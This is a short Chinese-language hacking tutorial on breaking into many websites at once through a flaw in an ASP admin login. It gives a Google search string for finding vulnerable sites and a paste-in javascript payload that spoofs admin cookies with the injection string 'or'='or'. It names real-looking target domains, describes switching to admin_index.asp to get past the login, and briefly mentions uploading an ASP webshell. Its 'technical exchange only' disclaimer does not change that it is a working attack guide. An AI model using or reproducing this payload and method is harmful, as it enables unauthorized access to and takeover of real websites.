0day批量入侵网站

*********************************************************
注：本教程只做技术交流，请不要用作非法用途
*********************************************************
讲师：阿董
课题：0day漏洞批量入侵网站教程
谷歌关键字：inurl:szwyadmin/login.asp 找到约 6,540 条结果
漏洞利用代码：
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
这个代码就是COOKIE欺骗万能or进后台！
目标站点： http://www.yszg.com.cn /szwyadmin/login.asp
找到目标站点后、复制漏洞利用代码、粘贴到IE浏览器、回车。
然后将后台地址login.asp改为admin_index.asp
http://old.bjcaa.cn/szwyadmin /admin_index.asp
好了，这样就成功的进入后台了。进入后，可以改管理员密码的。
关于拿webshel，是很简单的 上传图片asp大马，直接数据库备份，这个就不用教了吧